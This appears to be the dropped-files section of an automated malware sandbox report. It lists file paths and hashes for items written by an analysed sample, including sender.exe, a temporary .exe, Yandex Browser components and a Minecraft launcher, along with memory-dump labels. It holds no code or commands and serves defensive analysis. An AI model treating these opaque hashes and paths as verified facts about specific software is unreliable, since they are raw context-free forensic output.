C:\Users\Admin\AppData\Local\Temp\omnija-20245523.zip

MD5 dc5128fcb8d7f6b849f1166532db2dc8
SHA1 8427501d440d5edbbb2662294bc5650d2bc8aab5
SHA256 36e682f419c2b5d8e7c285d36088b56d59df3869dbd181943280696d4ca391ca
SHA512 bcf0d463ed4f01a313b8e6be745ad55b42108be84cc5850c411dec19aa7c6d996782da49fc208559f1188941bdd1082d954cfa316f08c0ad2efcf0662952e524

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 a11b3e48b8e072b77a5b58538bbeb752
SHA1 73b09ee489f44a3614410e114f1ac3bddb817ec3
SHA256 a719089dfdfc79bc33448d12b87e60701885ab7ad00978c5a73f0e1e6bb3e95a
SHA512 92328419f5a119ebe58beed7fcbbc897621923e5f4562003aadce9aeeaa48d776e9a536108ca8f24cd77c95739f8dc8b0b5b62730fb9ba72f8419e9c65c7c0f1

C:\Config.Msi\e585041.rbs

MD5 f3a0cfd72a674f7fed51c89e176c7761
SHA1 3e60c50bb9bad402e98fbd3a70b911def04b7be4
SHA256 a4f8abbe7c7ad95a002d372ec2f957ebc557cb32d4cc994fcb2d03dbedf990cd
SHA512 c527436deab917e68edd5c506da472c9e7187b9f911a07b251e3ab2dff4a1c0ecb09fd26cedad503ba2d096efac136c0571a0bc85afa66870ca7efe039154e2b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 99963563146961bcd160d909efb7ec06
SHA1 429c768b163bd30bd5caafd8059ffa3ca882de7a
SHA256 8cbff55b9dabfe2305098238d618bb4dcd6ff2971e3d235f4779b023eda1d0b2
SHA512 52c7ee0791f74645b4cee9231b41478b7fb4f5b5db546f585ec13e68cdda356fd91d5695f892816a51ed337cbf3616ce42b60385bed05a092b7a9086c6ded60f

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\VersionManager\versionlist.xml

MD5 1a545d0052b581fbb2ab4c52133846bc
SHA1 62f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256 557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512 bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\kwvh0l1k.Admin\places.sqlite-20240623215540.456238.backup

MD5 314cb7ffb31e3cc676847e03108378ba
SHA1 3667d2ade77624e79d9efa08a2f1d33104ac6343
SHA256 b6d278384a3684409a2a86f03e4f52869818ce7dd8b5779876960353f7d35dc1
SHA512 dc795fa35ea214843a781ee2b2ef551b91b6841a799bef2c6fb1907d90f6c114071a951ebb7b2b30e81d52b594d447a26ab12ddb57c331e854577d11e5febef5

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n9vxbo99.default-release\thumbnails\af9aab32f3a8d77462d5c418f4f0b55d

MD5 2d0a37bb716f9ad9fb916eb8b08d34c4
SHA1 48658fb5f716478bcfa239ba635589184edc33cf
SHA256 a08d93fef42579ebf000b3496ae50837ba14024fd07df04304534de480c72a1c
SHA512 15216319722cd68b7e0018cfd360a3ef3ba512a0686646677b51f4926ee8290f984e72fdd5a815dc5fdfc7170e8d9b2f207413574c96c7189291140475fe959b

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n9vxbo99.default-release\thumbnails\68f79a69daa8bcc89cc24690c2324c3b

MD5 af80a936c10e18de168538a0722d6319
SHA1 9b1c84a1cf7330a698c89b9d7f33b17b4ba35536
SHA256 2435c0376fca765b21d43e897f4baa52daa0958a7015d04103488c606c99d1d3
SHA512 9a1325c8ce05806e5c161a4cf47239f62baad8f79650fbd713e74928fce8171ced10ba7f24fac46c548e1dbf3f64106270cb25ca88c836c870107f5dc1f97879

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Services\www.ya.ru.ico

MD5 a6f6261de61d910e0b828040414cee02
SHA1 d9df5043d0405b3f5ddaacb74db36623dd3969dc
SHA256 6bb91f1d74389b18bce6e71772e4c5573648c1a4823338193f700afdf8216be5
SHA512 20cb7b646c160c942e379c6e7a1a8981a09f520361c0205052c1d66e2fdb76333ffaaf0ca1dfc779754f0e844b9946900fbd5690d01869e1607abc1fda6dffab

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks

MD5 c8ec9e6df3c365ec618433b7b317ca37
SHA1 01a7827c594e1ef77582125fb229bea876082a29
SHA256 12f8dbad0d744ae515807a4639daf28439fc0e9a5f7d6c6a71180cfef8d92b6c
SHA512 ea2de7651fa8a640f7814037db801ecaed40d9de72930f21ae733bd0f3be1571517b05332fdd38fb8b63cde6104732b8045538897eac4f3231412a5d710cd1e1

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\BookmarksExtras

MD5 48494b56c9b431d0e3283627a8e21c8a
SHA1 947054c2e5e73a1ed1198d343b42e33be16a5270
SHA256 d07780b45981c7728f70278b05181e493e25396966b8ef100e15917fc69de95c
SHA512 b318ea6c2a011088a269853d8263c84bdcf31857b983513ec0f39ed777e6c029064b995a176d580d75e9057fc9286f94597dc21f9619c4b0bbe02839228f39a4

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Bookmarks-20240623215541.862481.backup

MD5 3adec702d4472e3252ca8b58af62247c
SHA1 35d1d2f90b80dca80ad398f411c93fe8aef07435
SHA256 2b167248e8136c4d45c2c46e2bff6fb5e5137dd4dfdccde998599be2df2e9335
SHA512 7562e093d16ee6305c1bb143a3f5d60dafe8b5de74952709abc68a0c353b65416bf78b1fa1a6720331615898848c1464a7758c5dfe78f8098f77fbfa924784c0

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Preferences

MD5 e9f8dc645f24212e3a6a0e17a9b3f8a0
SHA1 28cefae18c56e194da88353557f3a453281d54a8
SHA256 fd257ef82dd4ab28c302c42b6623aae32fd18c0da806821251cdf9f6c172d9fd
SHA512 a7da60b3202b73a703c55dff4d12438447c93c897dcbbae2b1b6062177c92442e69e135cd647ce26f20af28340bcedbec44f21b09434280b51001e055d827724

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe

MD5 95828ee007d3586792d53ace50b2357e
SHA1 3501ccad7573fd467911f207155318db3a1a1554
SHA256 8c4be5f1bc4e2f73d4396af48a31bf10362006472e9b28f40aa91f73a3815f12
SHA512 9896eccb178fd772fc92e5793340bdbc1bd6169465d9a739df06c1154edbce16f6db5dd50df426ccbc40d8410d4ef170c3fb0bc700e7778149ff2168409638e7

C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Яндекс.website

MD5 d2fdab99df8a05cb2233b2b190fedbca
SHA1 3303cd68c1732e6cde273faa7789cff16f526aee
SHA256 c4a08741f47df82e576f3cedc286d0dd8698a38c0967d4a9eaf1c7ddc02817cc
SHA512 59eea6dd75c1987e7c2627f22be86a8521afbdde7c08b41a167241d98ec7717683ac4ca3db86a75220193f5ba9fd5ef8ce86d9a5a8cf7df43fa3f8ff090fcc0c

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.lnk

MD5 b73ac5b2279039e864e54a39501fd860
SHA1 51e092afd0eb71ea9454b96aad3bf2d3fc3b46d5
SHA256 e549fdc81d788f4e62594f31e6f414a3c314725449ed2f7d53e00b6017bcaaef
SHA512 0636c7cde979cae4c1e04e5e1a6d29798d6cd623519f354804ffec52bd77145584712fb75d5b2ffa3b16ee45d0f605403ecf2730d5c333d79eb09bce83159578

C:\Users\Admin\AppData\Roaming\Yandex\clids-yabrowser.xml

MD5 27a0d63958d264b1d1b307cbcae32d1e
SHA1 134e6abcb95aa2aeddce10db6325d47d5c2944eb
SHA256 e0148740e2dc882bc85880bdb6c626e4fb6555daf471bf34b4a4689c0634abc7
SHA512 33fb4c7c53efc8b6d77baac7fbb7a9848949029de8662ee9e663febc92fd426babc7c2200bf2890e70aa932df5bb883d409fe3ed50a41e3436dfcabe7a1bd229

C:\Users\Admin\AppData\Roaming\Yandex\ui

MD5 7c46cea88230d3d4d3d124f3db5063d3
SHA1 40193051dcba02f6f74f838ebe4b72c4effa14ab
SHA256 9068d48477914e99141a8e484ff16b1800f4acba9692e718e96ce37264a15e3e
SHA512 8906f6ac6b5f49c0c2ab1995b9b40d55992f7b9551be0d53bdd2cf47d532fb4d4429eee5540671ceeb240f16ba4988fe1e11f84285f23ce00ba0cb045dfad601

C:\Users\Admin\AppData\Local\Temp\6920E5B4-1D3A-475A-9E68-F99DF9289181\sender.exe

MD5 f1a8f60c018647902e70cf3869e1563f
SHA1 3caf9c51dfd75206d944d4c536f5f5ff8e225ae9
SHA256 36022c6ecb3426791e6edee9074a3861fe5b660d98f2b2b7c13b80fe11a75577
SHA512 c02dfd6276ad136283230cdf07d30ec2090562e6c60d6c0d4ac3110013780fcafd76e13931be53b924a35cf473d0f5ace2f6b5c3f1f70ce66b40338e53d38d1e

memory/1284-8512-0x0000000000D60000-0x00000000015A5000-memory.dmp

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\plugin2\msvcp140.dll

MD5 bf78c15068d6671693dfcdfa5770d705
SHA1 4418c03c3161706a4349dfe3f97278e7a5d8962a
SHA256 a88b8c1c8f27bf90fe960e0e8bd56984ad48167071af92d96ec1051f89f827fb
SHA512 5b6b0ab4e82cc979eaa619d387c6995198fd19aa0c455bef44bd37a765685575d57448b3b4accd70d3bd20a6cd408b1f518eda0f6dae5aa106f225bee8291372

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\vcruntime140_1.dll

MD5 fcda37abd3d9e9d8170cd1cd15bf9d3f
SHA1 b23ff3e9aa2287b9c1249a008c0ae06dc8b6fdf2
SHA256 0579d460ea1f7e8a815fa55a8821a5ff489c8097f051765e9beaf25d8d0f27d6
SHA512 de8be61499aaa1504dde8c19666844550c2ea7ef774ecbe26900834b252887da31d4cf4fb51338b16b6a4416de733e519ebf8c375eb03eb425232a6349da2257

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\vcruntime140.dll

MD5 7415c1cc63a0c46983e2a32581daefee
SHA1 5f8534d79c84ac45ad09b5a702c8c5c288eae240
SHA256 475ab98b7722e965bd38c8fa6ed23502309582ccf294ff1061cb290c7988f0d1
SHA512 3d4b24061f72c0e957c7b04a0c4098c94c8f1afb4a7e159850b9939c7210d73398be6f27b5ab85073b4e8c999816e7804fef0f6115c39cd061f4aaeb4dcda8cf

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\deploy\messages_zh_TW.properties

MD5 880baacb176553deab39edbe4b74380d
SHA1 37a57aad121c14c25e149206179728fa62203bf0
SHA256 ff4a3a92bc92cb08d2c32c435810440fd264edd63e56efa39430e0240c835620
SHA512 3039315bb283198af9090bd3d31cfae68ee73bc2b118bbae0b32812d4e3fd0f11ce962068d4a17b065dab9a66ef651b9cb8404c0a2defce74bb6b2d1d93646d5

C:\Users\Admin\AppData\Local\Temp\{D75E8FFB-E220-4A56-8F34-15BD8F50E315}.exe

MD5 bf2e1399a1e08ae36658b0aaa7fd5a99
SHA1 4d233713a23a77309a9470e13ae82c2a83cd8ae8
SHA256 c816c0bc31ab41c33f58bc4d3fbabd32bb4e06c7a0044d21a5e626f6bbfb9809
SHA512 8cbd230ebefbbd8a12780b60dff83a8543369e851ffc97fa2d5480432e69247eda671ba01a1200dd0adeae4aeb2518322e0564852a599f2c871aa440c0ee192c

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\images\cursors\win32_CopyNoDrop32x32.gif

MD5 1e9d8f133a442da6b0c74d49bc84a341
SHA1 259edc45b4569427e8319895a444f4295d54348f
SHA256 1a1d3079d49583837662b84e11d8c0870698511d9110e710eb8e7eb20df7ae3b
SHA512 63d6f70c8cab9735f0f857f5bf99e319f6ae98238dc7829dd706b7d6855c70be206e32e3e55df884402483cf8bebad00d139283af5c0b85dc1c5bf8f253acd37

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\security\policy\unlimited\US_export_policy.jar

MD5 12f971b6e65cbc7184701235469f0339
SHA1 06cb165157c5e0078b872c48707a1328b1dcba19
SHA256 84e035372ca8979bb4a387428a74942ffc7248a0e61988b7033b5b266cd187c8
SHA512 58646fc81de2e4750a3259d79a207a8cff2dc6692f178a63d92a453fc408c8d1088007ef4e93157d1017be706565716a0236039dbac848c40745a0ad89c4d0de

memory/1284-9665-0x0000000000D60000-0x00000000015A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lite_installer.log

MD5 37f5101a700b1112862cee0b20ea005f
SHA1 01bec9b57b54f0d5487d2f721d8b9bdff0af7d30
SHA256 22f57cf5138807fae125a47010cc884737aab2ce5efcc8ac1443d0dcb34113bb
SHA512 f68d4f5cd3caa02a438d6492d93c99280560264252126b07735d07338d95639aa287717f61eb87c9a1e0bf1cd58207bfb4172f04adb31513908c14556ace1119

C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe

MD5 82345958a39e7b1ad0b14ff2adeecaf9
SHA1 56e29f91f3ca1d5a3712e339ea5ac70f2904fbf7
SHA256 5fdc5fd46f4fbd5f1377c9cde1370b34bef76aec16f7ac3bcb89a1ee59329f99
SHA512 1182da48e1be07c2b21036336446e4af55dfc4f4fd1602701cf2a2c56ead437d9be5d994948f7b863215cffe1b627ff4331e4635db12f9eaf9d6ea7b6bf98ea2

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

MD5 122e34bfa3146ef9ae5a51fdc744353f
SHA1 f0cc2294fe150a4cceca8a3da8615edcc4eb20e4
SHA256 dd2169db3358ccdf4a4a185e4a22955c989eaa3b9d3e0e6025599b8fa173c968
SHA512 306341e00598f02a70d3edc6ef666cb64982f1e31e5c0a1304977a1700c95395c1c7f0857ae8056853370eced0bd2aeafc72da804a65f98c1422929b7c431700

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\lib\amd64\jvm.cfg

MD5 499f2a4e0a25a41c1ff80df2d073e4fd
SHA1 e2469cbe07e92d817637be4e889ebb74c3c46253
SHA256 80847ed146dbc5a9f604b07ec887737fc266699abba266177b553149487ce9eb
SHA512 7828f7b06d0f4309b9edd3aa71ae0bb7ee92d2f8df5642c13437bba2a3888e457dc9b24c16aa9e0f19231530cb44b8ccd955cbbdf5956ce8622cc208796b357d

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.dll

MD5 583e8b42864ec183c945164f373cb375
SHA1 5ec118befbb5d17593a05db2899ee52f7267da37
SHA256 9bc9178d3f4246433fe209a0f5ca70e77568e80c928268c78f8c8b00107ce6ed
SHA512 1feaac37bac19bde93171ebda2e76a65e9d5472a503b05939f6977b3a4d94d131298f3989dd048d7617ecd69cf09db7ac986fc39f0df9f56c84ea01726d0c898

memory/1284-9827-0x0000000000D60000-0x00000000015A5000-memory.dmp

memory/25568-9839-0x0000020365770000-0x0000020365771000-memory.dmp

memory/25624-9840-0x0000000000400000-0x000000000042F000-memory.dmp

memory/25284-9853-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9856-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9858-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9868-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9881-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9895-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9921-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9919-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9944-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\+JXF6331744818194215720.tmp

MD5 99c471b10eb25b8f0f1fe76a04926b0f
SHA1 807f89e70ccf186bde048c8a51a5c2d668190797
SHA256 9042ee73964614ed6b3eb4aa30df23c4ac5d3372deffb201ab9287540a34079c
SHA512 cbc263c2fbf1325c56adb312be8026ec25766a172bfd8d742a2e86292692c18fb185f595eb8b6fa2898e66ff95404ae52d9e52c393271e9f1fbbfd6c5bb9707d

C:\Users\Admin\AppData\Local\Temp\+JXF8596370695927296266.tmp

MD5 794162f5ab873e624c2e8adaef34aa73
SHA1 5e631244b866752f9232e170ed81ab94d252ac42
SHA256 b272fda2af48d26da480cd02d76059416539612615d38b9145b3f156d677ef7c
SHA512 d14a8abf8a3a4279652132ec145c5fad024001241e6c81d1e07c74ad3d438d61ea6f2e2a3d01812621763afbda99486ebe47f858a8dbd440c82448b1619a2426

memory/25284-9973-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-10000-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

memory/25284-9985-0x0000023D73DA0000-0x0000023D73DA1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\+JXF8192543535060456216.tmp

MD5 945426f5363c482553695c661ebc75a0
SHA1 feb3a62b783c6cba5175e957c6a4d1564e6de534
SHA256 b04761b165a8b32e5ac989a3cee07f27658634e7796f708b3e17ff5ccbe23622
SHA512 12658f86b8c3744329c2a4c4552ce25c5756e29aa984e0c7fd3fdee13abaa51b221d8ff78a9c406b084d3c08fffc3cdcb2b58f9cfb6af707ab9e3bc8fcee9e98

C:\Users\Admin\Videos\Captures\desktop.ini

MD5 b0d27eaec71f1cd73b015f5ceeb15f9d
SHA1 62264f8b5c2f5034a1e4143df6e8c787165fbc2f
SHA256 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2
SHA512 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.exe

MD5 1562e15220d8771fcb11b9a5b234a970
SHA1 50ec8e4e7125bda147a1b2ccc2b2827db2dc3479
SHA256 366199821c1efede3f7112d21da045fd6bf38b56fb3da1ae9d6493c4ddc1861f
SHA512 a07873f0a5381d202a6439a3245dd51f405cdcec4a9d40ff6ffdd4670a3b218008f7288a89e2a7455782c677d4c661bda96e62f813ce7d8c1f20a6c4c7c2b31f

C:\Users\Admin\AppData\Roaming\.minecraft\klauncher.json

MD5 57c3e459faf3f11f2703b43ebec49aed
SHA1 5afea178ac17047d3ad276a686858a40cdf833c2
SHA256 aa5edc077278a5985b07710342f0cf470f37d74709e01bc58f8b7e946f685d41
SHA512 81bf054b31925192bf6c615b50b599bf874584583d940b4f8f04aee092091a75fc776b99f77fe0275e7c7ce45d43ab5aa6113e24292b8b40ffeec674c0e0301f

C:\Users\Admin\AppData\Local\Temp\master_preferences

MD5 5c627a0acb0b4aa6850222290d1b9b30
SHA1 dc52e262636616c0524a08bbbffb62a8b9eab9ce
SHA256 15cbe382487e05ebc052b8ae3155e4ffbbb515bce90a76f15cda47e076a037d1
SHA512 6250e074b4d65e19ef50b1d7389af8e4ae7b97a47582c774c6dded0a5bde2919236cf991a0652d42e042392582e1a92adca9094f5b32015166ffd8b0f2ee7920

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YOJF4VYG\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\configs\all_zip

MD5 33b0f0599e46c248c6e7f41553fa707c
SHA1 90305d5f8c31a1ffbbff50a4fdbd4ae54b610298
SHA256 c5591c1f105ac121858c10df3cf71b75c7bb671f187b837bac17959d94578f3d
SHA512 68932e299ef7c4e5868e16006f193a5d7e606e8f9d96fe0172b4413cb57e5684fd81a3319cddceb3619074299b30a8981a51d9f0d9359af6cb2a2903faf2f533

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

MD5 7d5dcc6514ef69ab179e6744f853a78a
SHA1 0a7d0ea8fe4234ffd7cca24eb7fb93ad8f045474
SHA256 e80f1cb535a94fdd48bcc06e9b839c2ef831b1ea5f559ecd44bd67efc2a35985
SHA512 0e5eed3976624f207fc85217e60270bf28381a70291b46f7ce2a21c26430aa9e4010f66798b334e4a19cf2aacf5558089612e43edc2a27ba55bcf1e9fbab55a3

C:\ProgramData\Yandex\YandexBrowser\service_update.log

MD5 bb320f281895b878006f7896ebcffbb8
SHA1 7b823b54b08129e52ac2609a237b10d080afc2b0
SHA256 f0bb7bf7ae5b29a59b48cab1ae655e8e65e4c727c7bfc2a4663b53cbdc3fd1b4
SHA512 78ba117d70c55a5a8bc026dea7f7f6875b97b43a4c1df7b87ae05c700c27bd82ea5385d0abd1231224e5e1818b0bec86a01ec6783e748e513745c69b0fb7f2e3

C:\ProgramData\Yandex\YandexBrowser\service_update.log

MD5 78aa92d7791529f0c804352718029c5c
SHA1 d497793182902fb06ad4a80a6dda8d0679979667
SHA256 25a0c7d5fd630230de4e10f308a620ce17d822f97c014bfa1893f3e9bfa1b0d9
SHA512 5f01ab6c4940ccc11fb8574204435fe38fbb0037590bfb9091e1b5df815e980098a33611ad8af6aab5fc3ea80f1711e85cb8b63c8b16bb003528ba52bc7367cd

C:\ProgramData\Yandex\YandexBrowser\service_update.log

MD5 dafce687574a4d648165635cd6c4fcae
SHA1 fea7166f16600d8a2f7f67de15ff2d60762c2bac
SHA256 a10a16f3b9f61801e3c58b913651d468566317af82a35bc49d45ad3ae3a48942
SHA512 60e945609a98a80f0d9994fe1c9bd5584daaf58d8d4e08fcb8209d6e48631a4224210faeed90a952778d0579a4e324db4cd6b7165e3268ed9814e1352e2cb246

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.6.0.1878\partner_config

MD5 977bc7b2384ef1b3e78df8fbc3eeb16b
SHA1 7ee6110ca253005d738929b7ba0cc54ed2ed0a2e
SHA256 82e288090168abe15419015317fd38f56c1136e7481f66656d84e0a2d861d4d6
SHA512 4d154832ef3ac05abb1499a5bc8235d72f64cdaa3e6870206a6363c1d85d821604ae8a96850c2c8bd540d479b8dd5f3ce032472ed96bbf7eddb168ea3d2d1cf6

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.6.0.1878\brand_config

MD5 21a3e1e8b2352d3ee79f3cf3249eb5bd
SHA1 1f2d95c3fe89591a09dd8bb19b53ac879809aaa1
SHA256 3a9dcb32b11967a0f9e866dfb476d9f68c37ec4fe4b53f0673f376c8c763d80f
SHA512 01845d48f444a8d9d17a7f96e161b3bec55237c52340016496baf0a9c550ea9d6a7b89ea1359da079032877b0b9a71a6e4dc8312a4b3fd7b2f19a1a2f685b391

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\mountains_preview.jpg

MD5 a3272b575aa5f7c1af8eea19074665d1
SHA1 d4e3def9a37e9408c3a348867169fe573050f943
SHA256 55074794869b59cd5c693dfa6f6615aea068c2cd50cdae6dd69bd0410661ded8
SHA512 c69bf39362658dd6cbd827cf6db0f188a9c4410b3c6b7b532595fd5907974e2141d857942ffb2497282e31eaa33c71240c2c2bd8721046df55e3358e8b76c061

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\huangshan\huangshan.jpg

MD5 c51eed480a92977f001a459aa554595a
SHA1 0862f95662cff73b8b57738dfaca7c61de579125
SHA256 713c9e03aac760a11e51b833d7e1c9013759990b9b458363a856fd29ea108eec
SHA512 6f896c5f7f05524d05f90dc45914478a2f7509ea79114f240396791f658e2f7070e783fab6ac284327361dc2a48c5918b9f1c969b90795ceacce2c5c5bfa56ca

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\meadow\wallpaper.json

MD5 f3673bcc0e12e88f500ed9a94b61c88c
SHA1 e96e2b2b5c9de451d76742f04cc8a74b5d9a11c0
SHA256 c6581e9f59646e0a51a3194798ec994c7c5c99f28897108838aaf4a4e2bda04a
SHA512 83fb3fe4a3562449a53c13d1c38d5fe9ef1fa55c3006f59b65eace9a6ad4963e768088bc500dbe5266b5979c6ace77874ef11a15a7bd9fabae00ff137e70ecb5

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\morphology\stop-words-ru-RU.list

MD5 24281b7d32717473e29ffab5d5f25247
SHA1 aa1ae9c235504706891fd34bd172763d4ab122f6
SHA256 cbeec72666668a12ab6579ae0f45ccbdbe3d29ee9a862916f8c9793e2cf55552
SHA512 2f81c87358795640c5724cfabcabe3a4c19e5188cedeab1bd993c8ccfc91c9c63a63e77ac51b257496016027d8bccb779bd766174fa7ea2d744bd2e2c109cb8b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\morphology\dictionary-ru-RU.mrf.sig

MD5 d704b5744ddc826c0429dc7f39bc6208
SHA1 92a7ace56fb726bf7ea06232debe10e0f022bd57
SHA256 151739137bbbdf5f9608a82ec648bdf5d7454a81b86631b53dfc5ad602b207d6
SHA512 1c01217e3480872a6d0f595ceb1b2242ffe3e1ff8b3fdd76eea13a7541606b94d3ccd69492a88220e0e40c17da5d785e4dba1d7501e6be749b9c46f72572ef6f

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\morphology\dictionary-ru-RU.mrf

MD5 0be7417225caaa3c7c3fe03c6e9c2447
SHA1 ff3a8156e955c96cce6f87c89a282034787ef812
SHA256 1585b1599418d790da830ef11e8eeceee0cbb038876fe3959cc41858bd501dbc
SHA512 dfc0de77b717029a8c365146522580ab9d94e4b2327cef24db8f6535479790505c337852d0e924fbfa26e756b3aec911f27f5f17eba824496365c9a526464072

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\safebrowsing\download.png

MD5 528381b1f5230703b612b68402c1b587
SHA1 c29228966880e1a06df466d437ec90d1cac5bf2e
SHA256 3129d9eaba1c5f31302c2563ebfa85747eda7a6d3f95602de6b01b34e4369f04
SHA512 9eb45b0d4e3480a2d51a27ac5a6f20b9ef4e12bf8ac608043a5f01a372db5ea41a628458f7a0b02aaba94cd6bb8355a583d17666f87c3f29e82a0b899e9700bd

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\abstract\light_preview.jpg

MD5 9f6a43a5a7a5c4c7c7f9768249cbcb63
SHA1 36043c3244d9f76f27d2ff2d4c91c20b35e4452a
SHA256 add61971c87104187ae89e50cec62a196d6f8908315e85e76e16983539fba04b
SHA512 56d7bd72c8a380099309c36912513bcafbe1970830b000a1b89256aae20137c88e1e281f2455bb381ab120d682d6853d1ef05d8c57dd68a81a24b7a2a8d61387

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\abstract\light.jpg

MD5 3bf3da7f6d26223edf5567ee9343cd57
SHA1 50b8deaf89c88e23ef59edbb972c233df53498a2
SHA256 2e6f376222299f8142ff330e457867bad3300b21d96daec53579bf011629b896
SHA512 fef8e951c6cf5cec82dbeafd306de3ad46fd0d90e3f41dcea2a6046c95ab1ae39bf8a6e4a696580246c11330d712d4e6e8757ba24bbf180eec1e98a4aec1583b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\custogray\wallpaper.json

MD5 662f166f95f39486f7400fdc16625caa
SHA1 6b6081a0d3aa322163034c1d99f1db0566bfc838
SHA256 4cd690fb8ed5cd733a9c84d80d20d173496617e8dde6fca19e8a430517349ed5
SHA512 360a175c5e72ff8d2a01ee4e0f365237bbd725b695139ea54afc905e9e57686c5db8864b5abf31373a9cb475adcbdb3db292daf0a53c6eb643a5d61b868ad39b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\custogray\preview.png

MD5 0474a1a6ea2aac549523f5b309f62bff
SHA1 cc4acf26a804706abe5500dc8565d8dfda237c91
SHA256 55a236ad63d00d665b86ff7f91f2076226d5ed62b9d9e8f835f7cb998556545f
SHA512 d8e3de4fea62b29fd719376d33a65367a3a2a2a22ed175cc1eeff3e38dfbaac448c97a6fbea55bc6159351d11a6aad97e09cb12548cf297e01bd23bf6074de08

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\BrandPackageTemp\24.6.0.1878\resources\wallpapers\custogray\custogray_full.png

MD5 55841c472563c3030e78fcf241df7138
SHA1 69f9a73b0a6aaafa41cecff40b775a50e36adc90
SHA256 a7cd964345c3d15840b88fd9bc88f0d0c34a18edbf1ce39359af4582d1d7da45
SHA512 f7433d17937342d9d44aa86bcc30db9ae90450b84aa745d2c7390ff430449e195b693a8ae6df35d05fee2d97149a58a7d881737d57902d9885c6c55393d25d6f

